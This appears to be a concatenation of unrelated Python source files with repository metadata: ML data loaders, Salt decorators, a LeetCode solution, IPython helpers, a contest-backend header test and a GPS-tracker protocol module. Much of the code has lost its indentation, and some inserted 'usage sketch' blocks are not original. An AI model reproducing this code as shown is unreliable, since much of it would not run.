def batch_iter(data, batch_size, num_epochs):
"""
Generates a batch iterator for a dataset.
"""
data = np.array(data)
    data_size = data.shape[0]
num_batches_per_epoch = int(len(data) / batch_size) + 1
for epoch in range(num_epochs):
# Shuffle the data at each epoch
shuffle_indices = np.random.permutation(np.arange(data_size))
shuffled_data = data[shuffle_indices]
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_index:end_index]
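# --- Hedged usage sketch (added; not part of the original file) ---
# Iterates mini-batches over a toy dataset; the data and sizes are illustrative.
def _example_batch_iter():
    toy_data = list(zip(range(10), range(10)))  # 10 (x, y) pairs
    for batch in batch_iter(toy_data, batch_size=4, num_epochs=1):
        print(batch.shape)  # batches of at most 4 rows, e.g. (4, 2), (4, 2), (2, 2)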
def read_data_file(fname, target_index=0, normalize=True, binary=False):
content = pd.read_csv(fname, header=None, index_col=False)
content.dropna(inplace=True)
content.reset_index(inplace=True, drop=True)
    x = content.iloc[:, content.shape[1] - 1]
    x = np.array(x)
    y = content.iloc[:, target_index].values + 0.0
if normalize:
max_y = np.max(np.abs(y))
y /= max_y
if binary:
vals = list(set(y))
if len(vals) > 2:
raise Exception("Binary input data is not binary! Dataset %s, target_index=%d" % (fname, target_index))
y = np.array([0 if a == vals[0] else 1 for a in y])
return x, y
def load_ok_data_gender():
train_data = read_data_file('./data/ok/ok_train.csv', target_index=2, binary=True)
test_data = read_data_file('./data/ok/ok_test.csv', target_index=2, binary=True)
return train_data, test_data
def load_ok_user_data_gender():
train_data = read_data_file('./data/ok/ok_user_train.csv', target_index=2, binary=True)
test_data = read_data_file('./data/ok/ok_user_test.csv', target_index=2, binary=True)
return train_data, test_data
def load_sentirueval_data():
train_data = read_data_file('./data/sentirueval/train.csv')
test_data = read_data_file('./data/sentirueval/test.csv')
return train_data, test_data
def shuffle_matrix(x, y):
stacked = np.hstack((np.matrix(x).T, np.asmatrix(y).T))
np.random.shuffle(stacked)
xi = np.array(stacked[:, 0]).flatten()
yi = np.array(stacked[:, 1:])
return xi, yi
def clean_data_np(x):
# load data
all = [s.strip() for s in list(x)]
# split by words
x_text = [clean_str(sent) for sent in all]
x_text = [s.split(u" ") for s in x_text]
return x_text
def clean_data_lists(x):
# load data
all = [s.strip() for s in x]
# split by words
x_text = [clean_str(sent) for sent in all]
x_text = [s.split(u" ") for s in x_text]
return x_text
if __name__ == '__main__':
# read_w2v()
df = pd.DataFrame([{"x": u"привет"}, {"x": u"пока"}])
avg_line_length: 32.37395 | max_line_length: 115 | alphanum_fraction: 0.670993

hexsha: dd61b6b3ce3f8d32f8e1ae4c0fc133412ad32823 | size: 523 | ext: py | lang: Python
max_stars_repo: mmedit/models/backbones/encoder_decoders/encoders/__init__.py | rivergold/mmediting | fd972635c48bb065db29d1b5090592a87c7263d2 | ["Apache-2.0"] | stars: 1 | 2021-04-30T23:08:16.000Z to 2021-04-30T23:08:16.000Z
max_issues_repo: mmedit/models/backbones/encoder_decoders/encoders/__init__.py | rivergold/mmediting | fd972635c48bb065db29d1b5090592a87c7263d2 | ["Apache-2.0"] | issues: null
max_forks_repo: mmedit/models/backbones/encoder_decoders/encoders/__init__.py | rivergold/mmediting | fd972635c48bb065db29d1b5090592a87c7263d2 | ["Apache-2.0"] | forks: 2 | 2021-09-07T05:21:18.000Z to 2021-09-17T22:34:54.000Z
from .deepfill_encoder import DeepFillEncoder
from .gl_encoder import GLEncoder
from .indexnet_encoder import (DepthwiseIndexBlock, HolisticIndexBlock,
IndexNetEncoder)
from .pconv_encoder import PConvEncoder
from .resnet_enc import ResGCAEncoder, ResNetEnc, ResShortcutEnc
from .vgg import VGG16
__all__ = [
'GLEncoder', 'VGG16', 'ResNetEnc', 'HolisticIndexBlock',
'DepthwiseIndexBlock', 'ResShortcutEnc', 'PConvEncoder', 'DeepFillEncoder',
'IndexNetEncoder', 'ResGCAEncoder'
]
avg_line_length: 37.357143 | max_line_length: 79 | alphanum_fraction: 0.751434

hexsha: 3c32d1ba8369e99f2afe58d675224de3e510c4c2 | size: 3,062 | ext: py | lang: Python
max_stars_repo: salt/utils/decorators/state.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | ["Apache-2.0", "MIT"] | stars: 1 | 2020-03-31T22:51:16.000Z to 2020-03-31T22:51:16.000Z
max_issues_repo: salt/utils/decorators/state.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | ["Apache-2.0", "MIT"] | issues: null
max_forks_repo: salt/utils/decorators/state.py | yuriks/salt | d2a5bd8adddb98ec1718d79384aa13b4f37e8028 | ["Apache-2.0", "MIT"] | forks: 1 | 2021-09-30T07:00:01.000Z to 2021-09-30T07:00:01.000Z
# -*- coding: utf-8 -*-
'''
Decorators for salt.state
:codeauthor: :email:`Bo Maryniuk (bo@suse.de)`
'''
# Import Python libs
from __future__ import absolute_import, unicode_literals
import logging
# Import salt libs
import salt.utils.stringutils
from salt.exceptions import SaltException
log = logging.getLogger(__name__)
class OutputUnifier(object):
def __init__(self, *policies):
self.policies = []
for pls in policies:
if not hasattr(self, pls):
raise SaltException('Unknown policy: {0}'.format(pls))
else:
self.policies.append(getattr(self, pls))
def __call__(self, func):
def _func(*args, **kwargs):
result = func(*args, **kwargs)
for pls in self.policies:
try:
result = pls(result)
except Exception as exc: # pylint: disable=broad-except
log.debug('An exception occurred in this state: %s', exc,
exc_info_on_loglevel=logging.DEBUG)
result = {
'result': False,
'name': 'later',
'changes': {},
'comment': 'An exception occurred in this state: {0}'.format(exc)
}
return result
return _func
def content_check(self, result):
'''
Checks for specific types in the state output.
Raises an Exception in case particular rule is broken.
:param result:
:return:
'''
if not isinstance(result, dict):
err_msg = 'Malformed state return. Data must be a dictionary type.'
elif not isinstance(result.get('changes'), dict):
err_msg = "'Changes' should be a dictionary."
else:
missing = []
for val in ['name', 'result', 'changes', 'comment']:
if val not in result:
missing.append(val)
if missing:
err_msg = 'The following keys were not present in the state return: {0}.'.format(', '.join(missing))
else:
err_msg = None
if err_msg:
raise SaltException(err_msg)
return result
def unify(self, result):
'''
While comments as a list are allowed,
comments needs to be strings for backward compatibility.
See such claim here: https://github.com/saltstack/salt/pull/43070
Rules applied:
- 'comment' is joined into a multi-line string, in case the value is a list.
- 'result' should be always either True, False or None.
:param result:
:return:
'''
if isinstance(result.get('comment'), list):
result['comment'] = u'\n'.join([
salt.utils.stringutils.to_unicode(elm) for elm in result['comment']
])
if result.get('result') is not None:
result['result'] = bool(result['result'])
return result
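# --- Hedged usage sketch (added; not part of the original module) ---
# Shows how the decorator might be applied to a state function; the policy
# names mirror the methods defined above ('unify', 'content_check') and the
# state function itself is illustrative.
@OutputUnifier('unify', 'content_check')
def _example_state(name):
    return {
        'name': name,
        'result': 1,                               # unify() coerces this to True
        'changes': {},
        'comment': ['first line', 'second line']   # unify() joins this into one string
    }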
avg_line_length: 32.574468 | max_line_length: 116 | alphanum_fraction: 0.545395

hexsha: eda9603db063d35edf9811595032bf20a9f8600d | size: 76 | ext: py | lang: Python
max_stars_repo: python/test/test_two-dimensional_array.py | 1005281342/learn | c9d1e2e256842d9b4846c4870ac72e83d172b20e | ["Apache-2.0"] | stars: 1 | 2018-11-29T01:01:32.000Z to 2018-11-29T01:01:32.000Z
max_issues_repo: python/test/test_two-dimensional_array.py | 1005281342/learn | c9d1e2e256842d9b4846c4870ac72e83d172b20e | ["Apache-2.0"] | issues: null
max_forks_repo: python/test/test_two-dimensional_array.py | 1005281342/learn | c9d1e2e256842d9b4846c4870ac72e83d172b20e | ["Apache-2.0"] | forks: null
a = [1, 2, 3]
b = [3, 2, 1]
res = [i + j for i in a for j in b]
print(res)
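# The nested comprehension pairs every i in a with every j in b, so the
# expected output is [4, 3, 2, 5, 4, 3, 6, 5, 4].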
avg_line_length: 12.666667 | max_line_length: 35 | alphanum_fraction: 0.460526

hexsha: 8e3e3b0afb443f99f9960d7f468f0200c7044fe1 | size: 49 | ext: py | lang: Python
max_stars_repo: app/s2t2_script.py | antoniogriffith/example-open-source-repo-2021 | 7ae3e8342a0acf60b491e938566156215ccc4d14 | ["MIT"] | stars: null
max_issues_repo: app/s2t2_script.py | antoniogriffith/example-open-source-repo-2021 | 7ae3e8342a0acf60b491e938566156215ccc4d14 | ["MIT"] | issues: null
max_forks_repo: app/s2t2_script.py | antoniogriffith/example-open-source-repo-2021 | 7ae3e8342a0acf60b491e938566156215ccc4d14 | ["MIT"] | forks: null
print("HELLO WORLD!")
print("akg74_script.py")
avg_line_length: 9.8 | max_line_length: 24 | alphanum_fraction: 0.693878

hexsha: ae64668d45c2fef25a01df8a0211d105a9fdace1 | size: 959 | ext: py | lang: Python
max_stars_repo: transcriptic/sampledata/project.py | transcriptic/transcriptic | 1b5df943db266d18dbf055d0ace68c3cde8980e9 | ["BSD-3-Clause"] | stars: 32 | 2015-10-27T22:51:05.000Z to 2020-03-26T00:43:32.000Z
max_issues_repo: transcriptic/sampledata/project.py | transcriptic/transcriptic | 1b5df943db266d18dbf055d0ace68c3cde8980e9 | ["BSD-3-Clause"] | issues: 95 | 2015-10-27T15:30:46.000Z to 2020-03-30T00:38:05.000Z
max_forks_repo: transcriptic/sampledata/project.py | transcriptic/transcriptic | 1b5df943db266d18dbf055d0ace68c3cde8980e9 | ["BSD-3-Clause"] | forks: 10 | 2015-10-27T06:35:30.000Z to 2019-09-26T15:18:49.000Z
from transcriptic.jupyter import Project
from transcriptic.util import load_sampledata_json
def load_project_from_attributes(project_id: str, attributes: dict) -> Project:
"""
Helper function for constructing an object from specified attributes
"""
return Project(
project_id,
attributes=attributes,
)
sample_project_attr = load_sampledata_json("p123.json")
def load_sample_project(project_id="p123") -> Project:
"""
Loads sample project from registered mocked data.
Example Usage:
.. code-block:: python
my_project = load_sample_project()
my_project.name
Parameters
----------
project_id: str
ProjectId of registered object mock to load.
Returns
-------
Project
Returns a Project object with some mocked data
"""
return load_project_from_attributes(
project_id, load_sampledata_json(f"{project_id}.json")
)
avg_line_length: 22.833333 | max_line_length: 79 | alphanum_fraction: 0.671533

hexsha: f76a15d5a214460f77c5f990a1f21e5a8a02763b | size: 1,440 | ext: py | lang: Python
max_stars_repo: leetcode/editor/cn/FriendsOfAppropriateAges.py | huangge1199/leet-code-python | 5d01bbb6f12a495ea7ea0a90b5b3b4aa92bcc2f7 | ["Apache-2.0"] | stars: 1 | 2022-02-12T13:55:41.000Z to 2022-02-12T13:55:41.000Z
max_issues_repo: leetcode/editor/cn/FriendsOfAppropriateAges.py | huangge1199/leet-code-python | 5d01bbb6f12a495ea7ea0a90b5b3b4aa92bcc2f7 | ["Apache-2.0"] | issues: null
max_forks_repo: leetcode/editor/cn/FriendsOfAppropriateAges.py | huangge1199/leet-code-python | 5d01bbb6f12a495ea7ea0a90b5b3b4aa92bcc2f7 | ["Apache-2.0"] | forks: null
# There are n users on a social media website. You are given an integer array
# ages, where ages[i] is the age of the i-th user.
#
# User x will NOT send a friend request to user y (x != y) if any of the
# following conditions is true:
#
#  age[y] <= 0.5 * age[x] + 7
#  age[y] > age[x]
#  age[y] > 100 && age[x] < 100
#
# Otherwise, x will send a friend request to y.
#
# Note that if x sends a request to y, y does not have to send a request back
# to x. Also, users will not send friend requests to themselves.
#
# Return the total number of friend requests made on the website.
#
# Example 1:
#
# Input: ages = [16,16]
# Output: 2
# Explanation: The 2 users send friend requests to each other.
#
# Example 2:
#
# Input: ages = [16,17,18]
# Output: 2
# Explanation: The friend requests are 17 -> 16 and 18 -> 17.
#
# Example 3:
#
# Input: ages = [20,30,100,110,120]
# Output: 3
# Explanation: The friend requests are 110 -> 100, 120 -> 110 and 120 -> 100.
#
# Constraints:
#
# n == ages.length
# 1 <= n <= 2 * 10⁴
# 1 <= ages[i] <= 120
#
# Related Topics: Array, Two Pointers, Binary Search, Sorting 👍 85 👎 0
# 825: Friends of Appropriate Ages
# leetcode submit region begin(Prohibit modification and deletion)
from typing import List
class Solution:
def numFriendRequests(self, ages: List[int]) -> int:
n = len(ages)
ages.sort()
start = 0
end = 0
count = 0
for age in ages:
if age < 15:
continue
while ages[start] <= 0.5 * age + 7:
start += 1
while end + 1 < n and ages[end + 1] <= age:
end += 1
count += end - start
return count
if __name__ == "__main__":
Solution().numFriendRequests([16, 17, 18])
# leetcode submit region end(Prohibit modification and deletion)
avg_line_length: 17.777778 | max_line_length: 66 | alphanum_fraction: 0.506944

hexsha: 9fe19eabdaf00e746f5c45764afcfdfdcac0c5c6 | size: 102 | ext: py | lang: Python
max_stars_repo: basedir.py | xdvlabs/xumm-sdk-py | c92066a6e9738e402e0ae1627dd21fbc6b3bead1 | ["MIT"] | stars: 4 | 2022-01-29T11:22:06.000Z to 2022-03-01T03:36:59.000Z
max_issues_repo: basedir.py | CASL-AE/xumm-py | dbe040f409ffc5f918086a12f190ef289e709d22 | ["MIT"] | issues: 4 | 2022-01-14T22:49:02.000Z to 2022-01-18T17:32:21.000Z
max_forks_repo: basedir.py | CASL-AE/xumm-py | dbe040f409ffc5f918086a12f190ef289e709d22 | ["MIT"] | forks: 2 | 2022-03-01T03:32:35.000Z to 2022-03-20T17:11:56.000Z
#!/usr/bin/env python
# coding: utf-8
import os
basedir = os.path.abspath(os.path.dirname(__file__))
avg_line_length: 17 | max_line_length: 52 | alphanum_fraction: 0.72549

hexsha: 989f76b647fa12a158a99018d1de348250889d14 | size: 934 | ext: py | lang: Python
max_stars_repo: ailib/tools/utils_ipython.py | vandykai/ailib | 6ccb9536dc3f6f8ff138335d0153a2982635fca8 | ["Apache-2.0"] | stars: null
max_issues_repo: ailib/tools/utils_ipython.py | vandykai/ailib | 6ccb9536dc3f6f8ff138335d0153a2982635fca8 | ["Apache-2.0"] | issues: null
max_forks_repo: ailib/tools/utils_ipython.py | vandykai/ailib | 6ccb9536dc3f6f8ff138335d0153a2982635fca8 | ["Apache-2.0"] | forks: null
from contextlib import contextmanager
import pandas as pd
import IPython
from IPython.display import display
@contextmanager
def pd_display_all():
max_columns = pd.options.display.max_columns
max_rows = pd.options.display.max_rows
pd.options.display.max_columns=None
pd.options.display.max_rows=None
yield None
pd.options.display.max_columns = max_columns
pd.options.display.max_rows = max_rows
@contextmanager
def pd_display_reset():
max_columns = pd.options.display.max_columns
max_rows = pd.options.display.max_rows
pd.reset_option('display.max_columns')
pd.reset_option('display.max_rows')
yield None
pd.options.display.max_columns = max_columns
pd.options.display.max_rows = max_rows
def display_img(img_url):
    display(IPython.display.Image(img_url))
def display_html(html_str):
display(IPython.display.HTML(html_str))
def display_pd(data_frame):
with pd_display_all():
display(data_frame)
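# --- Hedged usage sketch (added; not part of the original module) ---
# Displays a wide DataFrame without pandas' column truncation; the frame
# shape is illustrative and an IPython/Jupyter session is assumed.
def _example_display_all():
    frame = pd.DataFrame({'col_{}'.format(i): range(5) for i in range(50)})
    display_pd(frame)  # pd_display_all() temporarily lifts the row/column limits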
avg_line_length: 28.30303 | max_line_length: 48 | alphanum_fraction: 0.759101

hexsha: b5e2f6574ed00b2298d8ff29f4499bc2c3d75a43 | size: 384 | ext: py | lang: Python
max_stars_repo: tests/echo.py | beosro/judy | 37fa9513dd755a865248c1cf26f197259b99a1fb | ["MIT"] | stars: 35 | 2016-09-02T08:27:51.000Z to 2021-08-02T22:22:08.000Z
max_issues_repo: tests/echo.py | nickoala/judy | 37fa9513dd755a865248c1cf26f197259b99a1fb | ["MIT"] | issues: null
max_forks_repo: tests/echo.py | nickoala/judy | 37fa9513dd755a865248c1cf26f197259b99a1fb | ["MIT"] | forks: 26 | 2017-01-11T04:54:08.000Z to 2019-07-10T04:35:42.000Z
import judy
vin = judy.VoiceIn(adcdev='plughw:1,0',
lm='/home/pi/judy/resources/lm/0931.lm',
dict='/home/pi/judy/resources/lm/0931.dic')
vout = judy.VoiceOut(device='plughw:0,0',
resources='/home/pi/judy/resources/audio')
def handle(phrase):
    print('Heard:', phrase)
vout.say(phrase)
judy.listen(vin, vout, handle)
avg_line_length: 25.6 | max_line_length: 63 | alphanum_fraction: 0.596354

hexsha: 8b2ec94fdc3a66d27a633ff774c3f7bfd7ad835e | size: 13,087 | ext: py | lang: Python
max_stars_repo: tests/test_hint_headers.py | davidnarum/bebras-platform | 2ff4abb121e4eb0ef3a635c363169b70ccef2666 | ["MIT"] | stars: 5 | 2017-06-08T10:14:16.000Z to 2021-07-27T21:51:58.000Z
max_issues_repo: tests/test_hint_headers.py | davidnarum/bebras-platform | 2ff4abb121e4eb0ef3a635c363169b70ccef2666 | ["MIT"] | issues: 22 | 2016-09-01T20:21:13.000Z to 2021-06-22T15:19:33.000Z
max_forks_repo: tests/test_hint_headers.py | davidnarum/bebras-platform | 2ff4abb121e4eb0ef3a635c363169b70ccef2666 | ["MIT"] | forks: 8 | 2015-12-01T12:55:49.000Z to 2020-11-01T13:33:58.000Z
#!/usr/bin/env python3
"""
This script exercises all endpoints normally accessed during a contest,
and checks that the X-Backend-Hints headers are correctly set on each
response.
"""
import http.client
import http.cookies
import json
import urllib.request
import urllib.parse
import urllib.error
import re
import sys
import traceback
QuotedStringRe = re.compile("\"(?:\\\\.|[^\"\\\\])*\"")
def unquote(qs):
qs = re.sub("^\"", '', qs)
qs = re.sub("\"$", '', qs)
qs = re.sub("\\\\(.)", '\\1', qs)
return qs
def read_http_header_value(raw_value):
return list(map(unquote, QuotedStringRe.findall(raw_value)))
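# Hedged example (added): the helpers above extract the quoted tokens from an
# X-Backend-Hints header value, e.g.
#   read_http_header_value('"ClientIP.loadSession:new" "Team(42):answer"')
#   -> ['ClientIP.loadSession:new', 'Team(42):answer']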
class Transaction(object):
def __init__(self, host, port=None, http_host=None, base=None):
self.host = host
self.port = port if port is not None else 80
self.http_host = http_host if http_host is not None else host
self.base = '' if base is None else base
self.sid = None # "e9avt4qvh4e06dqficqhv567u4"
def post_generic_request(self, endpoint, params):
# TODO: test params['SID'] = self.sid or clean up backend
post_body = urllib.parse.urlencode(params)
headers = {
'Host': self.http_host,
'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept': 'application/json'
}
if self.sid is not None:
headers['Cookie'] = "contest2={}".format(self.sid)
conn = http.client.HTTPConnection(self.host, self.port)
path = urllib.parse.urljoin(self.base, endpoint)
# print("base {}, endpoint {}, path {}".format(self.base, endpoint, path))
conn.request('POST', path, post_body, headers)
response = conn.getresponse()
if response.status != 200:
raise Exception(
'bad response {} {}'.format(response.status, response.reason))
# for header in response.getheaders():
# print(header)
hints = response.getheader('X-Backend-Hints', "")
cookies = http.cookies.SimpleCookie(response.getheader('Set-Cookie'))
if self.sid is None and 'contest2' in cookies:
self.sid = cookies['contest2'].value
str_body = response.read().decode("UTF-8")
try:
body = json.loads(str_body)
return body, hints
except Exception as ex:
print("JSON parsing error during request on {}".format(endpoint))
print(str(params))
print(str(ex))
print("the server response follows:")
print(str_body)
raise ex
def post_data_request(self, params):
return self.post_generic_request('data.php', params)
def post_answer_request(self, params):
return self.post_generic_request('answer.php', params)
def post_solutions_request(self, params):
return self.post_generic_request('solutions.php', params)
def checkHints(self, received, expected):
""" checkHints takes the received header (string) and list of
expected headers, prints any mismatches.
"""
rec_list = read_http_header_value(received)
for exp_value in expected:
if exp_value not in rec_list:
self.messages.append("missing: {}".format(exp_value))
for rec_value in rec_list:
if rec_value not in expected:
self.messages.append("unexpected: {}".format(rec_value))
def beginTest(self, name):
self.test_name = name
self.messages = list()
def endTest(self):
if self.messages:
print("\033[31;1m{}\033[0m".format(self.test_name))
for message in self.messages:
print("\033[31m{}\033[0m".format(message))
else:
print("\033[32m{}\033[0m".format(self.test_name))
def loadNewSession(self):
self.beginTest('loadNewSession')
body, hints = self.post_data_request({'action': 'loadSession'})
if not body.get('success', False):
raise Exception('loadSession: failed')
if 'SID' not in body or body['SID'] != self.sid:
raise Exception('loadSession: bad or missing SID')
self.checkHints(
hints,
[
"ClientIP.loadSession:new"
])
self.endTest()
def loadOldSession(self, check=True):
self.beginTest('loadOldSession')
body, hints = self.post_data_request({'action': 'loadSession'})
if not body.get('success', False):
raise Exception('loadSession: failed')
if 'SID' not in body or body['SID'] != self.sid:
raise Exception('loadSession: bad or missing SID')
if check:
self.checkHints(
hints,
[
"ClientIP.loadSession:found",
"SessionId({}):loadSession".format(self.sid)
])
self.endTest()
def destroySession(self, check=True):
self.beginTest('destroySession')
body, hints = self.post_data_request({'action': 'destroySession'})
if not body.get('success', False):
raise Exception('destroySession: failed')
if 'SID' not in body or body['SID'] != self.sid:
raise Exception('destroySession: bad or missing SID')
if check:
self.checkHints(
hints,
[
"ClientIP.destroySession"
])
self.endTest()
def loadPublicGroups(self):
self.beginTest('loadPublicGroups')
body, hints = self.post_data_request({'action': 'loadPublicGroups'})
if not body.get('success', False):
raise Exception('loadPublicGroups: failed')
self.checkHints(
hints, ["ClientIP.loadPublicGroups"])
self.group_code = body['groups'][-1]['code']
self.endTest()
def checkNoPassword(self):
self.beginTest('checkNoPassword')
body, hints = self.post_data_request({
'action': 'checkPassword'
})
if body.get('success', False):
raise Exception('unexpected success')
self.checkHints(
hints, [
"ClientIP.error",
"ClientIP.checkPassword:fail"
])
self.endTest()
def checkGroupPassword(self):
self.beginTest('checkGroupPassword')
body, hints = self.post_data_request({
'action': 'checkPassword',
'password': self.group_code,
'getTeams': False
})
if not body.get('success', False):
raise Exception('checkPassword(group): failed')
self.group = body
self.group_id = body.get('groupID')
self.checkHints(
hints, [
"ClientIP.checkPassword:pass",
"Group({}):checkPassword".format(self.group_id)
])
# {"groupID": "8506", "askGrade": true, "askStudentId": false, "askPhoneNumber": false,
# "success": true, "askEmail": false, "bRecovered": "0",
# "contestFolder": "2016_algorea_1_toaioxxapt", "teams": "",
# "fullFeedback": "1", "allowTeamsOfTwo": "0", "newInterface": "1",
# "contestName": "Entra\\u00eenement Algor\\u00e9a 2016 premier tour",
# "name": "Algor\\u00e9a 2016 premier tour : tous les niveaux",
# "contestID": "777116237588142336", "contestOpen": "Open",
# "contestShowSolutions": "1", "customIntro": null, "askGenre": true,
# "askZip": false, "nbUnlockedTasksInitial": "4",
# "nbMinutesElapsed": "478039", "bonusScore": "0", "subsetsSize": "0",
# "nbMinutes": "45", "contestVisibility": "Visible", "isPublic": "1"}
self.endTest()
def createTeam(self):
self.beginTest('createTeam')
body, hints = self.post_data_request({
'action': 'createTeam',
'contestants[0][lastName]': 'Anonymous',
'contestants[0][firstName]': 'Anonymous',
'contestants[0][genre]': '2',
'contestants[0][email]': '',
'contestants[0][zipCode]': ''
})
if not body.get('success', False):
raise Exception('createTeam: failed')
self.team_id = body.get('teamID')
self.team_code = body.get('password')
self.checkHints(
hints, [
"ClientIP.createTeam:public",
"Group({}):createTeam".format(self.group_id)
])
self.endTest()
def checkTeamPassword(self):
self.beginTest('checkTeamPassword')
body, hints = self.post_data_request({
'action': 'checkPassword',
'password': self.team_code,
'getTeams': False
})
if not body.get('success', False):
raise Exception('failed')
self.checkHints(
hints, [
"ClientIP.checkPassword:pass",
"Team({}):checkPassword".format(self.team_id)
])
self.endTest()
def loadContestData(self):
self.beginTest('loadContestData')
body, hints = self.post_data_request({
'action': 'loadContestData'
})
if not body.get('success', False):
raise Exception('loadContestData: failed')
self.checkHints(
hints, [
"ClientIP.loadContestData:pass",
"Team({}):loadContestData".format(self.team_id)
])
# {'success': True, 'teamPassword': '8rzmzsjn',
# 'questionsData': {
# '274': {'name': 'Variables', 'order': 4, 'noAnswerScore': 0,
# 'options': {}, 'minScore': 0, 'folder': 'algorea_2016',
# 'ID': '274', 'key': '2016-FR-19-minmax-variables',
# 'maxScore': 40, 'answerType': '0'}, ...},
# 'answers': [], 'scores': [], 'timeUsed': '0', 'endTime': None}
self.endTest()
def getRemainingTime(self):
self.beginTest('getRemainingTime')
body, hints = self.post_data_request({
'action': 'getRemainingTime',
'teamID': self.team_id
})
if not body.get('success', False):
raise Exception('getRemainingTime: failed')
self.checkHints(
hints, [
"ClientIP.getRemainingTime:pass",
"Team({}):getRemainingTime".format(self.team_id)
])
# {'success': True, 'remainingTime': 2700}
self.endTest()
def closeContest(self):
self.beginTest('closeContest')
body, hints = self.post_data_request({
'action': 'closeContest'
})
if not body.get('success', False):
raise Exception('closeContest: failed')
self.checkHints(
hints, [
"ClientIP.closeContest:pass",
"Team({}):closeContest".format(self.team_id)
])
self.endTest()
def sendAnswer(self):
self.beginTest('sendAnswer')
body, hints = self.post_answer_request({
'answers[270][answer]': '{"easy":"2 2 4 1","medium":"","hard":""}',
# 'answers[270][sending]': "true", # not used
'answers[270][score]': 99999,
'teamID': self.team_id,
'teamPassword': self.team_code
})
if not body.get('success', False):
raise Exception('sendAnswer: failed')
self.checkHints(
hints, [
"ClientIP.answer:pass",
"Team({}):answer".format(self.team_id)
])
self.endTest()
def getSolutions(self):
self.beginTest('getSolutions')
body, hints = self.post_solutions_request({'ieMode': 'false'})
if not body.get('success', False):
raise Exception('getSolutions: failed')
self.checkHints(
hints, [
"ClientIP.solutions:pass",
"Team({}):solutions".format(self.team_id)
])
self.endTest()
def run(self):
try:
self.loadNewSession()
self.destroySession()
self.loadPublicGroups()
self.loadNewSession()
self.checkNoPassword()
self.checkGroupPassword()
self.createTeam()
self.loadOldSession()
print('team code: {}'.format(self.team_code))
self.checkTeamPassword()
self.loadContestData()
self.getRemainingTime()
self.sendAnswer()
self.closeContest()
self.getSolutions()
except Exception as ex:
print("{}: caught {}".format(self.test_name, ex))
traceback.print_exc(file=sys.stdout)
if __name__ == '__main__':
Transaction(
# host='concours.castor-informatique.fr',
host='castor.home.epixode.fr',
base='/contestInterface/',
http_host='concours.castor-informatique.fr'
).run()
# body, hints = self.post_data_request({'action': 'checkPassword', 'password': '3m9trav3'})
avg_line_length: 36.454039 | max_line_length: 95 | alphanum_fraction: 0.560098

hexsha: 52a1eed7213f28307ab010f76a0469ac671483cd | size: 28,613 | ext: py | lang: Python
max_stars_repo: pythonlibs/mantis/BlueEarth/vendor/concox/gt03/message.py | adoggie/Tibet.6 | 3c53060edafd80b9c4dafa10699a68d86a410c66 | ["MIT"] | stars: 22 | 2019-10-28T07:28:12.000Z to 2022-03-19T15:36:41.000Z
max_issues_repo: pythonlibs/mantis/BlueEarth/vendor/concox/gt03/message.py | adoggie/Tibet.6 | 3c53060edafd80b9c4dafa10699a68d86a410c66 | ["MIT"] | issues: 1 | 2019-11-07T04:54:14.000Z to 2019-11-07T07:12:48.000Z
max_forks_repo: pythonlibs/mantis/BlueEarth/vendor/concox/gt03/message.py | adoggie/Tibet.6 | 3c53060edafd80b9c4dafa10699a68d86a410c66 | ["MIT"] | forks: 13 | 2019-10-28T07:29:07.000Z to 2021-11-03T06:53:12.000Z
#coding:utf-8
import datetime
import struct
from protocal import PacketType,MessageClsDict,TypeValue
from utils import ByteBuf
from mantis.fundamental.utils.useful import hash_object,object_assign
from mantis.fundamental.utils.useful import singleton
TIME_EAST = 0
TIME_WEST = 1
CONNECTED = 0
DISCONNECT = 1
GPS_YES = 1 # GPS has obtained a fix
GPS_NO = 0 # GPS has no fix
ON = 1
OFF = 0
LOW =0
HIGH = 1
# GPS upload mode: real-time vs. supplementary (catch-up) upload
GPS_UP_MODE_REAL = 0
GPS_UP_MODE_DELAY = 1 # 0x00 real-time upload, 0x01 supplementary (catch-up) upload
class MessageBase(object):
def __init__(self):
self.extra = None
self.name = ''
def dict(self):
data = hash_object(self,excludes=('extra','Type'))
return data
def from_dict(self, data):
object_assign(self,data)
class DownStream(object):
"""下行命令"""
def __init__(self):
pass
def packet(self):
from packet import NetWorkPacketAllocator
pkt = NetWorkPacketAllocator().createPacket()
pkt.type = self.Type.value
class MessageLogin(MessageBase):
""""""
Type = PacketType.Login
def __init__(self):
MessageBase.__init__(self)
self.device_id = ''
self.device_type = 0
self.timezone = 0
self.eastwest = TIME_EAST
self.language = 0
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
s = buf.read_bytes(8)
msg = MessageLogin()
msg.device_id = ''.join(map(lambda _:'%02x'%_,map(ord,s)))
if msg.device_id[0] == '0':
msg.device_id = msg.device_id[1:]
value = buf.read_uint16()
msg.eastwest = (value>>3) & 1
msg.timezone = (value>>4) / 100
msg.extra = extra
return msg
def dict(self):
return hash_object(self)
def from_dict(self,data):
object_assign(self,data)
class LanguageValue(object):
CHINESE = 1
ENGLISH = 2
def __init__(self):
self.value = self.CHINESE
class AlarmType(object):
    OK = TypeValue(0x00,u'Normal')
    SOS = TypeValue(0x01,u'SOS alarm')
    POWER_OFF = TypeValue(0x02,u'Power-cut alarm')
    SHAKE = TypeValue(0x03,u'Vibration alarm')
    FENCE_ENTER = TypeValue(0x04,u'Enter-fence alarm')
    FENCE_LEAVE = TypeValue(0x05,u'Leave-fence alarm')
    SPEED_OVER = TypeValue(0x06,u'Overspeed alarm')
    POSITION_MOVE = TypeValue(0x09,u'Displacement alarm')
    BLIND_AREA_ENTER = TypeValue(0x0A,u'Enter GPS blind-area alarm')
    BLIND_AREA_LEAVE = TypeValue(0x0B,u'Leave GPS blind-area alarm')
    TURN_ON = TypeValue(0x0C,u'Power-on alarm')
    FIRST_LOCATED = TypeValue(0x0D,u'First GPS fix alarm')
    LOWER_POWER = TypeValue(0x0E,u'External power low alarm')
    LOWER_POWER_PROTECT = TypeValue(0x0F,u'External power low-voltage protection alarm')
    CHANGE_SIMCARD = TypeValue(0x10,u'SIM card change alarm')
    SHUTDOWN = TypeValue(0x11,u'Shutdown alarm')
    FLY_MODE = TypeValue(0x12,u'Flight mode after external low-voltage protection alarm')
    DISMANTLE = TypeValue(0x13,u'Tamper (removal) alarm')
